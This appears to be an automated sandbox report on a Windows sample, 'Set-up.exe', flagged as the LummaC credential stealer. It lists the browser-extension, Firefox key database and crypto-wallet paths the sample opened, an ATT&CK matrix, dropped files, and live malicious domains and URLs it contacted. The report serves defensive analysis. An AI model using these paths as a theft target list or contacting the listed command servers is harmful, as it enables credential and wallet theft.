              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2173757711.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2174288204.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 2164, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 2164, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		11
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		LSASS Memory12
              File and Directory Discovery              		Remote Desktop Protocol41
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		3
              Obfuscated Files or Information              		Security Account Manager226
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              DLL Side-Loading              		NTDS1
              Query Registry              		Distributed Component Object ModelInput Capture14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets521
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
              Virtualization/Sandbox Evasion              		Cached Domain Credentials221
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Process Injection              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582492 Sample: Set-up.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 79 laborersquei.click 2->79 81 klipvumisui.shop 2->81 83 2 other IPs or domains 2->83 103 Suricata IDS alerts for network traffic 2->103 105 Malicious sample detected (through community Yara rule) 2->105 107 Antivirus detection for URL or domain 2->107 109 5 other signatures 2->109 12 Set-up.exe 1 2->12         started        signatures3 process4 dnsIp5 85 cegu.shop 185.161.251.21, 443, 49718 NTLGB United Kingdom 12->85 87 klipvumisui.shop 104.21.37.128, 443, 49720 CLOUDFLARENETUS United States 12->87 89 laborersquei.click 188.114.96.3, 443, 49704, 49705 CLOUDFLARENETUS European Union 12->89 69 C:\Users\user\...\9ONHJ3I0NWFBK4Q0S62.exe, PE32 12->69 dropped 111 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->111 113 Suspicious powershell command line found 12->113 115 Query firmware table information (likely to detect VMs) 12->115 117 4 other signatures 12->117 17 9ONHJ3I0NWFBK4Q0S62.exe 2 12->17         started        21 powershell.exe 15 23 12->21         started        file6 signatures7 process8 file9 61 C:\Users\user\...\9ONHJ3I0NWFBK4Q0S62.tmp, PE32 17->61 dropped 91 Multi AV Scanner detection for dropped file 17->91 23 9ONHJ3I0NWFBK4Q0S62.tmp 3 5 17->23         started        93 Loading BitLocker PowerShell Module 21->93 26 conhost.exe 21->26         started        signatures10 process11 file12 63 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 23->63 dropped 65 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 23->65 dropped 28 9ONHJ3I0NWFBK4Q0S62.exe 2 23->28         started        process13 file14 67 C:\Users\user\...\9ONHJ3I0NWFBK4Q0S62.tmp, PE32 28->67 dropped 31 9ONHJ3I0NWFBK4Q0S62.tmp 5 7 28->31         started        process15 file16 71 C:\Users\user\AppData\...\is-F9S0P.tmp, PE32 31->71 dropped 73 C:\Users\user\...\BrightLib.exe (copy), PE32 31->73 dropped 75 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 31->75 dropped 77 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 31->77 dropped 34 BrightLib.exe 31->34         started        37 cmd.exe 1 31->37         started        39 cmd.exe 31->39         started        41 5 other processes 31->41 process17 signatures18 95 Tries to detect virtualization through RDTSC time measurements 34->95 97 Sample or dropped binary is a compiled AutoHotkey binary 34->97 99 Switches to a custom stack to bypass stack traces 34->99 101 Found direct / indirect Syscall (likely to bypass EDR) 34->101 43 conhost.exe 37->43         started        45 tasklist.exe 37->45         started        47 find.exe 37->47         started        49 conhost.exe 39->49         started        51 tasklist.exe 39->51         started        53 find.exe 39->53         started        55 conhost.exe 41->55         started        57 conhost.exe 41->57         started        59 11 other processes 41->59 process19

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Set-up.exe5%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe39%ReversingLabsWin32.Spyware.Lummastealer
              C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp0%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\is-F9S0P.tmp8%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://laborersquei.click/apis0%Avira URL Cloudsafe
              https://klipvumisui.shop/Lm100%Avira URL Cloudmalware
              https://laborersquei.click/lm0%Avira URL Cloudsafe
              https://laborersquei.click/apiy0%Avira URL Cloudsafe
              https://cegu.shop:443/8574262446/ph.txt100%Avira URL Cloudmalware
              https://laborersquei.click/0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtt100%Avira URL Cloudmalware
              https://laborersquei.click/api)0%Avira URL Cloudsafe
              https://laborersquei.click/apite0%Avira URL Cloudsafe
              https://laborersquei.click/api.100%Avira URL Cloudmalware
              http://crl.microsoftc0%Avira URL Cloudsafe
              https://laborersquei.click/--0%Avira URL Cloudsafe
              https://laborersquei.click/apib0%Avira URL Cloudsafe
              https://laborersquei.click/api100%Avira URL Cloudmalware
              https://laborersquei.click/c0%Avira URL Cloudsafe
              https://cegu.shop/Tj100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                laborersquei.click
                		188.114.96.3
                		truefalse
                  		high
                  klipvumisui.shop
                  		104.21.37.128
                  		truefalse
                    		high
                    dfgh.online
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://klipvumisui.shop/int_clp_sha.txtfalse
                        		high
                        https://cegu.shop/8574262446/ph.txtfalse
                          		high
                          https://laborersquei.click/apitrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://cegu.shop:443/8574262446/ph.txtSet-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215763752.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://duckduckgo.com/chrome_newtabSet-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUSet-up.exe, 00000000.00000003.2245407143.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2246639052.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2256757804.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2256424330.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2240577276.000000000395E000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2243028644.00000000038A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2253316872.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2257864056.00000000038FE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2255372655.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2240400232.0000000003884000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2257576660.00000000037B5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2241234626.0000000003886000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2258990958.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2254270801.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2241369142.000000000395B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2254967557.00000000037B3000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2238320059.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2254530724.00000000038D2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2256105330.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2255517886.00000000037BB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2256263442.00000000037B5000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://certs.securetrust.com/CA0:Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://ocsp.vikingcloud.com/0ASet-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.microsoftSet-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://klipvumisui.shop/LmSet-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312625508.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2301046960.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://certs.securetrust.com/issuers/TWGCA.crt0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.vikingcloud.com/0:Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dfgh.online/invoker.php?compName=powershell.exe, 00000003.00000002.2252728333.0000000004090000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://laborersquei.click/apisSet-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.000000000077B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://laborersquei.click/apiteSet-up.exe, 00000000.00000003.2195047189.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184622292.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://laborersquei.click/apiySet-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.vikingcloud.com/TWGCA.crl0tSet-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://laborersquei.click/Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2173757711.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2194970895.000000000353A000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://certs.securetrust.com/CA05Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://laborersquei.click/api)Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://laborersquei.click/lmSet-up.exe, 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://x1.c.lencr.org/0Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://x1.i.lencr.org/0Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://laborersquei.click/api.Set-up.exe, 00000000.00000003.2131714421.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://klipvumisui.shop/int_clp_sha.txttSet-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312557136.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://certs.securetrust.com/CA0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.microsoft.cSet-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.mozilla.org/products/firefoxgro.allSet-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.trustwave.com/TWGCA.crl0nSet-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.securetrust.com/TWGCSCA_L1.crl0ySet-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://laborersquei.click/--Set-up.exe, 00000000.00000003.2131714421.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://cegu.shop/TjSet-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
